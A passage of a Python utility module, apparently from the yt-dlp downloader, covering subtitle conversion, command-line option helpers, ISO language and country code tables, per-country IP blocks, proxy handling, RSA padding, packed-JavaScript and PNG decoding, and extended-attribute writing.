for k, v in sorted(style.items()):
if self._applied_styles and self._applied_styles[-1].get(k) == v:
continue
if k == 'color':
font += ' color="%s"' % v
elif k == 'fontSize':
font += ' size="%s"' % v
elif k == 'fontFamily':
font += ' face="%s"' % v
elif k == 'fontWeight' and v == 'bold':
self._out += '<b>'
unclosed_elements.append('b')
elif k == 'fontStyle' and v == 'italic':
self._out += '<i>'
unclosed_elements.append('i')
elif k == 'textDecoration' and v == 'underline':
self._out += '<u>'
unclosed_elements.append('u')
if font:
self._out += '<font' + font + '>'
unclosed_elements.append('font')
applied_style = {}
if self._applied_styles:
applied_style.update(self._applied_styles[-1])
applied_style.update(style)
self._applied_styles.append(applied_style)
self._unclosed_elements.append(unclosed_elements)
def end(self, tag):
if tag not in (_x('ttml:br'), 'br'):
unclosed_elements = self._unclosed_elements.pop()
for element in reversed(unclosed_elements):
self._out += '</%s>' % element
if unclosed_elements and self._applied_styles:
self._applied_styles.pop()
def data(self, data):
self._out += data
def close(self):
return self._out.strip()
def parse_node(node):
target = TTMLPElementParser()
parser = xml.etree.ElementTree.XMLParser(target=target)
parser.feed(xml.etree.ElementTree.tostring(node))
return parser.close()
for k, v in LEGACY_NAMESPACES:
for ns in v:
dfxp_data = dfxp_data.replace(ns, k)
dfxp = compat_etree_fromstring(dfxp_data)
out = []
paras = dfxp.findall(_x('.//ttml:p')) or dfxp.findall('.//p')
if not paras:
raise ValueError('Invalid dfxp/TTML subtitle')
repeat = False
while True:
for style in dfxp.findall(_x('.//ttml:style')):
style_id = style.get('id') or style.get(_x('xml:id'))
if not style_id:
continue
parent_style_id = style.get('style')
if parent_style_id:
if parent_style_id not in styles:
repeat = True
continue
styles[style_id] = styles[parent_style_id].copy()
for prop in SUPPORTED_STYLING:
prop_val = style.get(_x('tts:' + prop))
if prop_val:
styles.setdefault(style_id, {})[prop] = prop_val
if repeat:
repeat = False
else:
break
for p in ('body', 'div'):
ele = xpath_element(dfxp, [_x('.//ttml:' + p), './/' + p])
if ele is None:
continue
style = styles.get(ele.get('style'))
if not style:
continue
default_style.update(style)
for para, index in zip(paras, itertools.count(1)):
begin_time = parse_dfxp_time_expr(para.attrib.get('begin'))
end_time = parse_dfxp_time_expr(para.attrib.get('end'))
dur = parse_dfxp_time_expr(para.attrib.get('dur'))
if begin_time is None:
continue
if not end_time:
if not dur:
continue
end_time = begin_time + dur
out.append('%d\n%s --> %s\n%s\n\n' % (
index,
srt_subtitles_timecode(begin_time),
srt_subtitles_timecode(end_time),
parse_node(para)))
return ''.join(out)
def cli_option(params, command_option, param):
param = params.get(param)
if param:
param = compat_str(param)
return [command_option, param] if param is not None else []
def cli_bool_option(params, command_option, param, true_value='true', false_value='false', separator=None):
param = params.get(param)
if param is None:
return []
assert isinstance(param, bool)
if separator:
return [command_option + separator + (true_value if param else false_value)]
return [command_option, true_value if param else false_value]
def cli_valueless_option(params, command_option, param, expected_value=True):
param = params.get(param)
return [command_option] if param == expected_value else []
def cli_configuration_args(argdict, keys, default=[], use_compat=True):
if isinstance(argdict, (list, tuple)): # for backward compatibility
if use_compat:
return argdict
else:
argdict = None
if argdict is None:
return default
assert isinstance(argdict, dict)
assert isinstance(keys, (list, tuple))
for key_list in keys:
arg_list = list(filter(
lambda x: x is not None,
[argdict.get(key.lower()) for key in variadic(key_list)]))
if arg_list:
return [arg for args in arg_list for arg in args]
return default
class ISO639Utils(object):
# See http://www.loc.gov/standards/iso639-2/ISO-639-2_utf-8.txt
_lang_map = {
'aa': 'aar',
'ab': 'abk',
'ae': 'ave',
'af': 'afr',
'ak': 'aka',
'am': 'amh',
'an': 'arg',
'ar': 'ara',
'as': 'asm',
'av': 'ava',
'ay': 'aym',
'az': 'aze',
'ba': 'bak',
'be': 'bel',
'bg': 'bul',
'bh': 'bih',
'bi': 'bis',
'bm': 'bam',
'bn': 'ben',
'bo': 'bod',
'br': 'bre',
'bs': 'bos',
'ca': 'cat',
'ce': 'che',
'ch': 'cha',
'co': 'cos',
'cr': 'cre',
'cs': 'ces',
'cu': 'chu',
'cv': 'chv',
'cy': 'cym',
'da': 'dan',
'de': 'deu',
'dv': 'div',
'dz': 'dzo',
'ee': 'ewe',
'el': 'ell',
'en': 'eng',
'eo': 'epo',
'es': 'spa',
'et': 'est',
'eu': 'eus',
'fa': 'fas',
'ff': 'ful',
'fi': 'fin',
'fj': 'fij',
'fo': 'fao',
'fr': 'fra',
'fy': 'fry',
'ga': 'gle',
'gd': 'gla',
'gl': 'glg',
'gn': 'grn',
'gu': 'guj',
'gv': 'glv',
'ha': 'hau',
'he': 'heb',
'iw': 'heb', # Replaced by he in 1989 revision
'hi': 'hin',
'ho': 'hmo',
'hr': 'hrv',
'ht': 'hat',
'hu': 'hun',
'hy': 'hye',
'hz': 'her',
'ia': 'ina',
'id': 'ind',
'in': 'ind', # Replaced by id in 1989 revision
'ie': 'ile',
'ig': 'ibo',
'ii': 'iii',
'ik': 'ipk',
'io': 'ido',
'is': 'isl',
'it': 'ita',
'iu': 'iku',
'ja': 'jpn',
'jv': 'jav',
'ka': 'kat',
'kg': 'kon',
'ki': 'kik',
'kj': 'kua',
'kk': 'kaz',
'kl': 'kal',
'km': 'khm',
'kn': 'kan',
'ko': 'kor',
'kr': 'kau',
'ks': 'kas',
'ku': 'kur',
'kv': 'kom',
'kw': 'cor',
'ky': 'kir',
'la': 'lat',
'lb': 'ltz',
'lg': 'lug',
'li': 'lim',
'ln': 'lin',
'lo': 'lao',
'lt': 'lit',
'lu': 'lub',
'lv': 'lav',
'mg': 'mlg',
'mh': 'mah',
'mi': 'mri',
'mk': 'mkd',
'ml': 'mal',
'mn': 'mon',
'mr': 'mar',
'ms': 'msa',
'mt': 'mlt',
'my': 'mya',
'na': 'nau',
'nb': 'nob',
'nd': 'nde',
'ne': 'nep',
'ng': 'ndo',
'nl': 'nld',
'nn': 'nno',
'no': 'nor',
'nr': 'nbl',
'nv': 'nav',
'ny': 'nya',
'oc': 'oci',
'oj': 'oji',
'om': 'orm',
'or': 'ori',
'os': 'oss',
'pa': 'pan',
'pi': 'pli',
'pl': 'pol',
'ps': 'pus',
'pt': 'por',
'qu': 'que',
'rm': 'roh',
'rn': 'run',
'ro': 'ron',
'ru': 'rus',
'rw': 'kin',
'sa': 'san',
'sc': 'srd',
'sd': 'snd',
'se': 'sme',
'sg': 'sag',
'si': 'sin',
'sk': 'slk',
'sl': 'slv',
'sm': 'smo',
'sn': 'sna',
'so': 'som',
'sq': 'sqi',
'sr': 'srp',
'ss': 'ssw',
'st': 'sot',
'su': 'sun',
'sv': 'swe',
'sw': 'swa',
'ta': 'tam',
'te': 'tel',
'tg': 'tgk',
'th': 'tha',
'ti': 'tir',
'tk': 'tuk',
'tl': 'tgl',
'tn': 'tsn',
'to': 'ton',
'tr': 'tur',
'ts': 'tso',
'tt': 'tat',
'tw': 'twi',
'ty': 'tah',
'ug': 'uig',
'uk': 'ukr',
'ur': 'urd',
'uz': 'uzb',
've': 'ven',
'vi': 'vie',
'vo': 'vol',
'wa': 'wln',
'wo': 'wol',
'xh': 'xho',
'yi': 'yid',
'ji': 'yid', # Replaced by yi in 1989 revision
'yo': 'yor',
'za': 'zha',
'zh': 'zho',
'zu': 'zul',
}
@classmethod
def short2long(cls, code):
"""Convert language code from ISO 639-1 to ISO 639-2/T"""
return cls._lang_map.get(code[:2])
@classmethod
def long2short(cls, code):
"""Convert language code from ISO 639-2/T to ISO 639-1"""
for short_name, long_name in cls._lang_map.items():
if long_name == code:
return short_name
class ISO3166Utils(object):
# From http://data.okfn.org/data/core/country-list
_country_map = {
'AF': 'Afghanistan',
'AX': 'Åland Islands',
'AL': 'Albania',
'DZ': 'Algeria',
'AS': 'American Samoa',
'AD': 'Andorra',
'AO': 'Angola',
'AI': 'Anguilla',
'AQ': 'Antarctica',
'AG': 'Antigua and Barbuda',
'AR': 'Argentina',
'AM': 'Armenia',
'AW': 'Aruba',
'AU': 'Australia',
'AT': 'Austria',
'AZ': 'Azerbaijan',
'BS': 'Bahamas',
'BH': 'Bahrain',
'BD': 'Bangladesh',
'BB': 'Barbados',
'BY': 'Belarus',
'BE': 'Belgium',
'BZ': 'Belize',
'BJ': 'Benin',
'BM': 'Bermuda',
'BT': 'Bhutan',
'BO': 'Bolivia, Plurinational State of',
'BQ': 'Bonaire, Sint Eustatius and Saba',
'BA': 'Bosnia and Herzegovina',
'BW': 'Botswana',
'BV': 'Bouvet Island',
'BR': 'Brazil',
'IO': 'British Indian Ocean Territory',
'BN': 'Brunei Darussalam',
'BG': 'Bulgaria',
'BF': 'Burkina Faso',
'BI': 'Burundi',
'KH': 'Cambodia',
'CM': 'Cameroon',
'CA': 'Canada',
'CV': 'Cape Verde',
'KY': 'Cayman Islands',
'CF': 'Central African Republic',
'TD': 'Chad',
'CL': 'Chile',
'CN': 'China',
'CX': 'Christmas Island',
'CC': 'Cocos (Keeling) Islands',
'CO': 'Colombia',
'KM': 'Comoros',
'CG': 'Congo',
'CD': 'Congo, the Democratic Republic of the',
'CK': 'Cook Islands',
'CR': 'Costa Rica',
'CI': 'Côte d\'Ivoire',
'HR': 'Croatia',
'CU': 'Cuba',
'CW': 'Curaçao',
'CY': 'Cyprus',
'CZ': 'Czech Republic',
'DK': 'Denmark',
'DJ': 'Djibouti',
'DM': 'Dominica',
'DO': 'Dominican Republic',
'EC': 'Ecuador',
'EG': 'Egypt',
'SV': 'El Salvador',
'GQ': 'Equatorial Guinea',
'ER': 'Eritrea',
'EE': 'Estonia',
'ET': 'Ethiopia',
'FK': 'Falkland Islands (Malvinas)',
'FO': 'Faroe Islands',
'FJ': 'Fiji',
'FI': 'Finland',
'FR': 'France',
'GF': 'French Guiana',
'PF': 'French Polynesia',
'TF': 'French Southern Territories',
'GA': 'Gabon',
'GM': 'Gambia',
'GE': 'Georgia',
'DE': 'Germany',
'GH': 'Ghana',
'GI': 'Gibraltar',
'GR': 'Greece',
'GL': 'Greenland',
'GD': 'Grenada',
'GP': 'Guadeloupe',
'GU': 'Guam',
'GT': 'Guatemala',
'GG': 'Guernsey',
'GN': 'Guinea',
'GW': 'Guinea-Bissau',
'GY': 'Guyana',
'HT': 'Haiti',
'HM': 'Heard Island and McDonald Islands',
'VA': 'Holy See (Vatican City State)',
'HN': 'Honduras',
'HK': 'Hong Kong',
'HU': 'Hungary',
'IS': 'Iceland',
'IN': 'India',
'ID': 'Indonesia',
'IR': 'Iran, Islamic Republic of',
'IQ': 'Iraq',
'IE': 'Ireland',
'IM': 'Isle of Man',
'IL': 'Israel',
'IT': 'Italy',
'JM': 'Jamaica',
'JP': 'Japan',
'JE': 'Jersey',
'JO': 'Jordan',
'KZ': 'Kazakhstan',
'KE': 'Kenya',
'KI': 'Kiribati',
'KP': 'Korea, Democratic People\'s Republic of',
'KR': 'Korea, Republic of',
'KW': 'Kuwait',
'KG': 'Kyrgyzstan',
'LA': 'Lao People\'s Democratic Republic',
'LV': 'Latvia',
'LB': 'Lebanon',
'LS': 'Lesotho',
'LR': 'Liberia',
'LY': 'Libya',
'LI': 'Liechtenstein',
'LT': 'Lithuania',
'LU': 'Luxembourg',
'MO': 'Macao',
'MK': 'Macedonia, the Former Yugoslav Republic of',
'MG': 'Madagascar',
'MW': 'Malawi',
'MY': 'Malaysia',
'MV': 'Maldives',
'ML': 'Mali',
'MT': 'Malta',
'MH': 'Marshall Islands',
'MQ': 'Martinique',
'MR': 'Mauritania',
'MU': 'Mauritius',
'YT': 'Mayotte',
'MX': 'Mexico',
'FM': 'Micronesia, Federated States of',
'MD': 'Moldova, Republic of',
'MC': 'Monaco',
'MN': 'Mongolia',
'ME': 'Montenegro',
'MS': 'Montserrat',
'MA': 'Morocco',
'MZ': 'Mozambique',
'MM': 'Myanmar',
'NA': 'Namibia',
'NR': 'Nauru',
'NP': 'Nepal',
'NL': 'Netherlands',
'NC': 'New Caledonia',
'NZ': 'New Zealand',
'NI': 'Nicaragua',
'NE': 'Niger',
'NG': 'Nigeria',
'NU': 'Niue',
'NF': 'Norfolk Island',
'MP': 'Northern Mariana Islands',
'NO': 'Norway',
'OM': 'Oman',
'PK': 'Pakistan',
'PW': 'Palau',
'PS': 'Palestine, State of',
'PA': 'Panama',
'PG': 'Papua New Guinea',
'PY': 'Paraguay',
'PE': 'Peru',
'PH': 'Philippines',
'PN': 'Pitcairn',
'PL': 'Poland',
'PT': 'Portugal',
'PR': 'Puerto Rico',
'QA': 'Qatar',
'RE': 'Réunion',
'RO': 'Romania',
'RU': 'Russian Federation',
'RW': 'Rwanda',
'BL': 'Saint Barthélemy',
'SH': 'Saint Helena, Ascension and Tristan da Cunha',
'KN': 'Saint Kitts and Nevis',
'LC': 'Saint Lucia',
'MF': 'Saint Martin (French part)',
'PM': 'Saint Pierre and Miquelon',
'VC': 'Saint Vincent and the Grenadines',
'WS': 'Samoa',
'SM': 'San Marino',
'ST': 'Sao Tome and Principe',
'SA': 'Saudi Arabia',
'SN': 'Senegal',
'RS': 'Serbia',
'SC': 'Seychelles',
'SL': 'Sierra Leone',
'SG': 'Singapore',
'SX': 'Sint Maarten (Dutch part)',
'SK': 'Slovakia',
'SI': 'Slovenia',
'SB': 'Solomon Islands',
'SO': 'Somalia',
'ZA': 'South Africa',
'GS': 'South Georgia and the South Sandwich Islands',
'SS': 'South Sudan',
'ES': 'Spain',
'LK': 'Sri Lanka',
'SD': 'Sudan',
'SR': 'Suriname',
'SJ': 'Svalbard and Jan Mayen',
'SZ': 'Swaziland',
'SE': 'Sweden',
'CH': 'Switzerland',
'SY': 'Syrian Arab Republic',
'TW': 'Taiwan, Province of China',
'TJ': 'Tajikistan',
'TZ': 'Tanzania, United Republic of',
'TH': 'Thailand',
'TL': 'Timor-Leste',
'TG': 'Togo',
'TK': 'Tokelau',
'TO': 'Tonga',
'TT': 'Trinidad and Tobago',
'TN': 'Tunisia',
'TR': 'Turkey',
'TM': 'Turkmenistan',
'TC': 'Turks and Caicos Islands',
'TV': 'Tuvalu',
'UG': 'Uganda',
'UA': 'Ukraine',
'AE': 'United Arab Emirates',
'GB': 'United Kingdom',
'US': 'United States',
'UM': 'United States Minor Outlying Islands',
'UY': 'Uruguay',
'UZ': 'Uzbekistan',
'VU': 'Vanuatu',
'VE': 'Venezuela, Bolivarian Republic of',
'VN': 'Viet Nam',
'VG': 'Virgin Islands, British',
'VI': 'Virgin Islands, U.S.',
'WF': 'Wallis and Futuna',
'EH': 'Western Sahara',
'YE': 'Yemen',
'ZM': 'Zambia',
'ZW': 'Zimbabwe',
}
@classmethod
def short2full(cls, code):
"""Convert an ISO 3166-2 country code to the corresponding full name"""
return cls._country_map.get(code.upper())
class GeoUtils(object):
# Major IPv4 address blocks per country
_country_ip_map = {
'AD': '46.172.224.0/19',
'AE': '94.200.0.0/13',
'AF': '149.54.0.0/17',
'AG': '209.59.64.0/18',
'AI': '204.14.248.0/21',
'AL': '46.99.0.0/16',
'AM': '46.70.0.0/15',
'AO': '105.168.0.0/13',
'AP': '182.50.184.0/21',
'AQ': '23.154.160.0/24',
'AR': '181.0.0.0/12',
'AS': '202.70.112.0/20',
'AT': '77.116.0.0/14',
'AU': '1.128.0.0/11',
'AW': '181.41.0.0/18',
'AX': '185.217.4.0/22',
'AZ': '5.197.0.0/16',
'BA': '31.176.128.0/17',
'BB': '65.48.128.0/17',
'BD': '114.130.0.0/16',
'BE': '57.0.0.0/8',
'BF': '102.178.0.0/15',
'BG': '95.42.0.0/15',
'BH': '37.131.0.0/17',
'BI': '154.117.192.0/18',
'BJ': '137.255.0.0/16',
'BL': '185.212.72.0/23',
'BM': '196.12.64.0/18',
'BN': '156.31.0.0/16',
'BO': '161.56.0.0/16',
'BQ': '161.0.80.0/20',
'BR': '191.128.0.0/12',
'BS': '24.51.64.0/18',
'BT': '119.2.96.0/19',
'BW': '168.167.0.0/16',
'BY': '178.120.0.0/13',
'BZ': '179.42.192.0/18',
'CA': '99.224.0.0/11',
'CD': '41.243.0.0/16',
'CF': '197.242.176.0/21',
'CG': '160.113.0.0/16',
'CH': '85.0.0.0/13',
'CI': '102.136.0.0/14',
'CK': '202.65.32.0/19',
'CL': '152.172.0.0/14',
'CM': '102.244.0.0/14',
'CN': '36.128.0.0/10',
'CO': '181.240.0.0/12',
'CR': '201.192.0.0/12',
'CU': '152.206.0.0/15',
'CV': '165.90.96.0/19',
'CW': '190.88.128.0/17',
'CY': '31.153.0.0/16',
'CZ': '88.100.0.0/14',
'DE': '53.0.0.0/8',
'DJ': '197.241.0.0/17',
'DK': '87.48.0.0/12',
'DM': '192.243.48.0/20',
'DO': '152.166.0.0/15',
'DZ': '41.96.0.0/12',
'EC': '186.68.0.0/15',
'EE': '90.190.0.0/15',
'EG': '156.160.0.0/11',
'ER': '196.200.96.0/20',
'ES': '88.0.0.0/11',
'ET': '196.188.0.0/14',
'EU': '2.16.0.0/13',
'FI': '91.152.0.0/13',
'FJ': '144.120.0.0/16',
'FK': '80.73.208.0/21',
'FM': '119.252.112.0/20',
'FO': '88.85.32.0/19',
'FR': '90.0.0.0/9',
'GA': '41.158.0.0/15',
'GB': '25.0.0.0/8',
'GD': '74.122.88.0/21',
'GE': '31.146.0.0/16',
'GF': '161.22.64.0/18',
'GG': '62.68.160.0/19',
'GH': '154.160.0.0/12',
'GI': '95.164.0.0/16',
'GL': '88.83.0.0/19',
'GM': '160.182.0.0/15',
'GN': '197.149.192.0/18',
'GP': '104.250.0.0/19',
'GQ': '105.235.224.0/20',
'GR': '94.64.0.0/13',
'GT': '168.234.0.0/16',
'GU': '168.123.0.0/16',
'GW': '197.214.80.0/20',
'GY': '181.41.64.0/18',
'HK': '113.252.0.0/14',
'HN': '181.210.0.0/16',
'HR': '93.136.0.0/13',
'HT': '148.102.128.0/17',
'HU': '84.0.0.0/14',
'ID': '39.192.0.0/10',
'IE': '87.32.0.0/12',
'IL': '79.176.0.0/13',
'IM': '5.62.80.0/20',
'IN': '117.192.0.0/10',
'IO': '203.83.48.0/21',
'IQ': '37.236.0.0/14',
'IR': '2.176.0.0/12',
'IS': '82.221.0.0/16',
'IT': '79.0.0.0/10',
'JE': '87.244.64.0/18',
'JM': '72.27.0.0/17',
'JO': '176.29.0.0/16',
'JP': '133.0.0.0/8',
'KE': '105.48.0.0/12',
'KG': '158.181.128.0/17',
'KH': '36.37.128.0/17',
'KI': '103.25.140.0/22',
'KM': '197.255.224.0/20',
'KN': '198.167.192.0/19',
'KP': '175.45.176.0/22',
'KR': '175.192.0.0/10',
'KW': '37.36.0.0/14',
'KY': '64.96.0.0/15',
'KZ': '2.72.0.0/13',
'LA': '115.84.64.0/18',
'LB': '178.135.0.0/16',
'LC': '24.92.144.0/20',
'LI': '82.117.0.0/19',
'LK': '112.134.0.0/15',
'LR': '102.183.0.0/16',
'LS': '129.232.0.0/17',
'LT': '78.56.0.0/13',
'LU': '188.42.0.0/16',
'LV': '46.109.0.0/16',
'LY': '41.252.0.0/14',
'MA': '105.128.0.0/11',
'MC': '88.209.64.0/18',
'MD': '37.246.0.0/16',
'ME': '178.175.0.0/17',
'MF': '74.112.232.0/21',
'MG': '154.126.0.0/17',
'MH': '117.103.88.0/21',
'MK': '77.28.0.0/15',
'ML': '154.118.128.0/18',
'MM': '37.111.0.0/17',
'MN': '49.0.128.0/17',
'MO': '60.246.0.0/16',
'MP': '202.88.64.0/20',
'MQ': '109.203.224.0/19',
'MR': '41.188.64.0/18',
'MS': '208.90.112.0/22',
'MT': '46.11.0.0/16',
'MU': '105.16.0.0/12',
'MV': '27.114.128.0/18',
'MW': '102.70.0.0/15',
'MX': '187.192.0.0/11',
'MY': '175.136.0.0/13',
'MZ': '197.218.0.0/15',
'NA': '41.182.0.0/16',
'NC': '101.101.0.0/18',
'NE': '197.214.0.0/18',
'NF': '203.17.240.0/22',
'NG': '105.112.0.0/12',
'NI': '186.76.0.0/15',
'NL': '145.96.0.0/11',
'NO': '84.208.0.0/13',
'NP': '36.252.0.0/15',
'NR': '203.98.224.0/19',
'NU': '49.156.48.0/22',
'NZ': '49.224.0.0/14',
'OM': '5.36.0.0/15',
'PA': '186.72.0.0/15',
'PE': '186.160.0.0/14',
'PF': '123.50.64.0/18',
'PG': '124.240.192.0/19',
'PH': '49.144.0.0/13',
'PK': '39.32.0.0/11',
'PL': '83.0.0.0/11',
'PM': '70.36.0.0/20',
'PR': '66.50.0.0/16',
'PS': '188.161.0.0/16',
'PT': '85.240.0.0/13',
'PW': '202.124.224.0/20',
'PY': '181.120.0.0/14',
'QA': '37.210.0.0/15',
'RE': '102.35.0.0/16',
'RO': '79.112.0.0/13',
'RS': '93.86.0.0/15',
'RU': '5.136.0.0/13',
'RW': '41.186.0.0/16',
'SA': '188.48.0.0/13',
'SB': '202.1.160.0/19',
'SC': '154.192.0.0/11',
'SD': '102.120.0.0/13',
'SE': '78.64.0.0/12',
'SG': '8.128.0.0/10',
'SI': '188.196.0.0/14',
'SK': '78.98.0.0/15',
'SL': '102.143.0.0/17',
'SM': '89.186.32.0/19',
'SN': '41.82.0.0/15',
'SO': '154.115.192.0/18',
'SR': '186.179.128.0/17',
'SS': '105.235.208.0/21',
'ST': '197.159.160.0/19',
'SV': '168.243.0.0/16',
'SX': '190.102.0.0/20',
'SY': '5.0.0.0/16',
'SZ': '41.84.224.0/19',
'TC': '65.255.48.0/20',
'TD': '154.68.128.0/19',
'TG': '196.168.0.0/14',
'TH': '171.96.0.0/13',
'TJ': '85.9.128.0/18',
'TK': '27.96.24.0/21',
'TL': '180.189.160.0/20',
'TM': '95.85.96.0/19',
'TN': '197.0.0.0/11',
'TO': '175.176.144.0/21',
'TR': '78.160.0.0/11',
'TT': '186.44.0.0/15',
'TV': '202.2.96.0/19',
'TW': '120.96.0.0/11',
'TZ': '156.156.0.0/14',
'UA': '37.52.0.0/14',
'UG': '102.80.0.0/13',
'US': '6.0.0.0/8',
'UY': '167.56.0.0/13',
'UZ': '84.54.64.0/18',
'VA': '212.77.0.0/19',
'VC': '207.191.240.0/21',
'VE': '186.88.0.0/13',
'VG': '66.81.192.0/20',
'VI': '146.226.0.0/16',
'VN': '14.160.0.0/11',
'VU': '202.80.32.0/20',
'WF': '117.20.32.0/21',
'WS': '202.4.32.0/19',
'YE': '134.35.0.0/16',
'YT': '41.242.116.0/22',
'ZA': '41.0.0.0/11',
'ZM': '102.144.0.0/13',
'ZW': '102.177.192.0/18',
}
@classmethod
def random_ipv4(cls, code_or_block):
if len(code_or_block) == 2:
block = cls._country_ip_map.get(code_or_block.upper())
if not block:
return None
else:
block = code_or_block
addr, preflen = block.split('/')
addr_min = compat_struct_unpack('!L', socket.inet_aton(addr))[0]
addr_max = addr_min | (0xffffffff >> int(preflen))
return compat_str(socket.inet_ntoa(
compat_struct_pack('!L', random.randint(addr_min, addr_max))))
class PerRequestProxyHandler(compat_urllib_request.ProxyHandler):
def __init__(self, proxies=None):
# Set default handlers
for type in ('http', 'https'):
setattr(self, '%s_open' % type,
lambda r, proxy='__noproxy__', type=type, meth=self.proxy_open:
meth(r, proxy, type))
compat_urllib_request.ProxyHandler.__init__(self, proxies)
def proxy_open(self, req, proxy, type):
req_proxy = req.headers.get('Ytdl-request-proxy')
if req_proxy is not None:
proxy = req_proxy
del req.headers['Ytdl-request-proxy']
if proxy == '__noproxy__':
return None # No Proxy
if compat_urlparse.urlparse(proxy).scheme.lower() in ('socks', 'socks4', 'socks4a', 'socks5'):
req.add_header('Ytdl-socks-proxy', proxy)
# yt-dlp's http/https handlers do wrapping the socket with socks
return None
return compat_urllib_request.ProxyHandler.proxy_open(
self, req, proxy, type)
# Both long_to_bytes and bytes_to_long are adapted from PyCrypto, which is
# released into Public Domain
# https://github.com/dlitz/pycrypto/blob/master/lib/Crypto/Util/number.py#L387
def long_to_bytes(n, blocksize=0):
"""long_to_bytes(n:long, blocksize:int) : string
Convert a long integer to a byte string.
If optional blocksize is given and greater than zero, pad the front of the
byte string with binary zeros so that the length is a multiple of
blocksize.
"""
# after much testing, this algorithm was deemed to be the fastest
s = b''
n = int(n)
while n > 0:
s = compat_struct_pack('>I', n & 0xffffffff) + s
n = n >> 32
# strip off leading zeros
for i in range(len(s)):
if s[i] != b'\000'[0]:
break
else:
# only happens when n == 0
s = b'\000'
i = 0
s = s[i:]
# add back some pad bytes. this could be done more efficiently w.r.t. the
# de-padding being done above, but sigh...
if blocksize > 0 and len(s) % blocksize:
s = (blocksize - len(s) % blocksize) * b'\000' + s
return s
def bytes_to_long(s):
"""bytes_to_long(string) : long
Convert a byte string to a long integer.
This is (essentially) the inverse of long_to_bytes().
"""
acc = 0
length = len(s)
if length % 4:
extra = (4 - length % 4)
s = b'\000' * extra + s
length = length + extra
for i in range(0, length, 4):
acc = (acc << 32) + compat_struct_unpack('>I', s[i:i + 4])[0]
return acc
def ohdave_rsa_encrypt(data, exponent, modulus):
'''
Implement OHDave's RSA algorithm. See http://www.ohdave.com/rsa/
Input:
data: data to encrypt, bytes-like object
exponent, modulus: parameter e and N of RSA algorithm, both integer
Output: hex string of encrypted data
Limitation: supports one block encryption only
'''
payload = int(binascii.hexlify(data[::-1]), 16)
encrypted = pow(payload, exponent, modulus)
return '%x' % encrypted
def pkcs1pad(data, length):
"""
Padding input data with PKCS#1 scheme
@param {int[]} data input data
@param {int} length target length
@returns {int[]} padded data
"""
if len(data) > length - 11:
raise ValueError('Input data too long for PKCS#1 padding')
pseudo_random = [random.randint(0, 254) for _ in range(length - len(data) - 3)]
return [0, 2] + pseudo_random + [0] + data
def encode_base_n(num, n, table=None):
FULL_TABLE = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
if not table:
table = FULL_TABLE[:n]
if n > len(table):
raise ValueError('base %d exceeds table length %d' % (n, len(table)))
if num == 0:
return table[0]
ret = ''
while num:
ret = table[num % n] + ret
num = num // n
return ret
def decode_packed_codes(code):
mobj = re.search(PACKED_CODES_RE, code)
obfuscated_code, base, count, symbols = mobj.groups()
base = int(base)
count = int(count)
symbols = symbols.split('|')
symbol_table = {}
while count:
count -= 1
base_n_count = encode_base_n(count, base)
symbol_table[base_n_count] = symbols[count] or base_n_count
return re.sub(
r'\b(\w+)\b', lambda mobj: symbol_table[mobj.group(0)],
obfuscated_code)
def caesar(s, alphabet, shift):
if shift == 0:
return s
l = len(alphabet)
return ''.join(
alphabet[(alphabet.index(c) + shift) % l] if c in alphabet else c
for c in s)
def rot47(s):
return caesar(s, r'''!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~''', 47)
def parse_m3u8_attributes(attrib):
info = {}
for (key, val) in re.findall(r'(?P<key>[A-Z0-9-]+)=(?P<val>"[^"]+"|[^",]+)(?:,|$)', attrib):
if val.startswith('"'):
val = val[1:-1]
info[key] = val
return info
def urshift(val, n):
return val >> n if val >= 0 else (val + 0x100000000) >> n
# Based on png2str() written by @gdkchan and improved by @yokrysty
# Originally posted at https://github.com/ytdl-org/youtube-dl/issues/9706
def decode_png(png_data):
# Reference: https://www.w3.org/TR/PNG/
header = png_data[8:]
if png_data[:8] != b'\x89PNG\x0d\x0a\x1a\x0a' or header[4:8] != b'IHDR':
raise IOError('Not a valid PNG file.')
int_map = {1: '>B', 2: '>H', 4: '>I'}
unpack_integer = lambda x: compat_struct_unpack(int_map[len(x)], x)[0]
chunks = []
while header:
length = unpack_integer(header[:4])
header = header[4:]
chunk_type = header[:4]
header = header[4:]
chunk_data = header[:length]
header = header[length:]
header = header[4:] # Skip CRC
chunks.append({
'type': chunk_type,
'length': length,
'data': chunk_data
})
ihdr = chunks[0]['data']
width = unpack_integer(ihdr[:4])
height = unpack_integer(ihdr[4:8])
idat = b''
for chunk in chunks:
if chunk['type'] == b'IDAT':
idat += chunk['data']
if not idat:
raise IOError('Unable to read PNG data.')
decompressed_data = bytearray(zlib.decompress(idat))
stride = width * 3
pixels = []
def _get_pixel(idx):
x = idx % stride
y = idx // stride
return pixels[y][x]
for y in range(height):
basePos = y * (1 + stride)
filter_type = decompressed_data[basePos]
current_row = []
pixels.append(current_row)
for x in range(stride):
color = decompressed_data[1 + basePos + x]
basex = y * stride + x
left = 0
up = 0
if x > 2:
left = _get_pixel(basex - 3)
if y > 0:
up = _get_pixel(basex - stride)
if filter_type == 1: # Sub
color = (color + left) & 0xff
elif filter_type == 2: # Up
color = (color + up) & 0xff
elif filter_type == 3: # Average
color = (color + ((left + up) >> 1)) & 0xff
elif filter_type == 4: # Paeth
a = left
b = up
c = 0
if x > 2 and y > 0:
c = _get_pixel(basex - stride - 3)
p = a + b - c
pa = abs(p - a)
pb = abs(p - b)
pc = abs(p - c)
if pa <= pb and pa <= pc:
color = (color + a) & 0xff
elif pb <= pc:
color = (color + b) & 0xff
else:
color = (color + c) & 0xff
current_row.append(color)
return width, height, pixels
def write_xattr(path, key, value):
# This mess below finds the best xattr tool for the job
try:
# try the pyxattr module...
import xattr
if hasattr(xattr, 'set'): # pyxattr
# Unicode arguments are not supported in python-pyxattr until
# version 0.5.0
# See https://github.com/ytdl-org/youtube-dl/issues/5498
pyxattr_required_version = '0.5.0'
if version_tuple(xattr.__version__) < version_tuple(pyxattr_required_version):
# TODO: fallback to CLI tools
raise XAttrUnavailableError(
'python-pyxattr is detected but is too old. '
'yt-dlp requires %s or above while your version is %s. '
'Falling back to other xattr implementations' % (
pyxattr_required_version, xattr.__version__))
setxattr = xattr.set
else: # xattr
setxattr = xattr.setxattr
try:
setxattr(path, key, value)
except EnvironmentError as e:
raise XAttrMetadataError(e.errno, e.strerror)
except ImportError:
if compat_os_name == 'nt':
# Write xattrs to NTFS Alternate Data Streams:
